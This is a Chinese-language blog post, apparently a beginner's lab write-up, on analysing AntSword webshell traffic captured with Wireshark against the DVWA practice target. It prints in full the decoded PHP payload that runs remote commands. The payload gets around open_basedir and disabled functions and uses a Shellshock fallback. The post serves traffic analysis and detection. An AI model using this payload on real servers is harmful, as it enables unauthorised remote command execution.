Webshell之蚁剑流量分析

雪玖

已于 2023-05-15 10:53:50 修改

阅读量2.2k

点赞数

文章标签：安全网络安全 web安全 wireshark

于 2023-05-15 10:50:26 首次发布

本文链接：https://blog.csdn.net/qq_51323560/article/details/130679103

版权

一.在DVWA靶场获取webshell

1.首先搭建DVWA

2.在DVWA选择File Upload关卡

3.上传webshell

4.访问webshell页面

5.用蚁剑连接webshell

6.连接shell成功

二.抓取蚁剑webshell连接流量

1.使用wireshark抓取流量包

2.通过三次握手，追踪第一次http流量响应

分析发现没有referer字段

Content-type：application/x-www-form-urlencoded

分析发现为URL编码

3.解密流量

三.抓取蚁剑webshell虚拟终端流量

1.wireshark流量抓取

2.追踪数据流并且解码

3.解码后的恶意代码

@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item . "/.1b7683e8cb4";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", " /");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out)
{
    return $out;
};
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "cdd3" . "7c35e";
    echo @asenc($output);
    echo "c9cb" . "8c28";
}
ob_start();
try {
    $p = base64_decode(substr($_POST["m0300de6257f67"], 2));
    $s = base64_decode(substr($_POST["k0252207ae80f4"], 2));
    $envstr = @base64_decode(substr($_POST["i6813797614ba8"], 2));
    $d = dirname($_SERVER["SCRIPT_FILENAME"]);
    $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
    if (substr($d, 0, 1) == "/") {
        @putenv("PATH=" . getenv(" PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=" . getenv(" PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if (!empty($envstr)) {
        $envarr = explode("|||asline|||", $envstr);
        foreach ($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r = "{$p} {$c}";
    function fe($f)
    {
        $d = explode(",", @ini_get("disable_functions"));
        if (empty($d)) {
            $d = array();
        } else {
            $d = array_map('trim', array_map('strtolower', $d));
        }
        return (function_exists($f) && is_callable($f) && !in_array($f, $d));
    };
    function runshellshock($d, $c)
    {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c>$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("a@127.0.0.1", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    };
    function runcmd($c)
    {
        $ret = 0;
        $d = dirname($_SERVER["SCRIPT_FILENAME"]);
        if (fe('system')) {
            @system($c, $ret);
        } elseif (fe('passthru')) {
            @passthru($c, $ret);
        } elseif (fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif (fe('exec')) {
            @exec($c, $o, $ret);
            print(join(" ", $o));
        } elseif (fe('popen')) {
            $fp = @popen($c, 'r');
            while (!@feof($fp)) {
                print(@fgets($fp, 2048));
            }
            @pclose($fp);
        } elseif (fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while (!@feof($io[1])) {
                print(@fgets($io[1], 2048));
            }
            while (!@feof($io[2])) {
                print(@fgets($io[2], 2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif (fe('antsystem')) {
            @antsystem($c);
        } elseif (runshellshock($d, $c)) {
            return $ret;
        } elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) {
            $w = new COM('WScript.shell');
            $e = $w->exec($c);
            $so = $e->StdOut();
            $ret .= $so->ReadAll();
            $se = $e->StdErr();
            $ret .= $se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    };
    $ret = @runcmd($r . " 2>&1");
    print ($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

4.分析代码，发现主要代码

$p = base64_decode(substr($_POST["m0300de6257f67"], 2));
$s = base64_decode(substr($_POST["k0252207ae80f4"], 2));
$envstr = @base64_decode(substr($_POST["i6813797614ba8"], 2));

（1） substr()

【1】函数用于截取字符串中指定长度的字符

【2】语法格式：int substr(string str, int start , int length)

【3】参数：

参数1，str参数是指将要进行截取字符操作的字符串。

参数2，start参数是指定截取操作的起始位置。

参数3， length参数是说明本次截取操作的长度，

（2）分析发现真正有效的字符串是去除头部的2个字母

（3）查看虚拟终端执行的命令

5.分析完成

----------第一次学习webshell流量分析，还请大佬们多多指教----------

雪玖

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
1
评论
Webshell之蚁剑流量分析

--------------------------------------------------------------------------------------------------------------------------------第一次学习webshell流量分析，还请大佬们多多指教。参数1，str参数是指将要进行截取字符操作的字符串。参数3， length参数是说明本次截取操作的长度，（2）分析发现真正有效的字符串是去除头部的2个字母。（3）查看虚拟终端执行的命令。
复制链接

扫一扫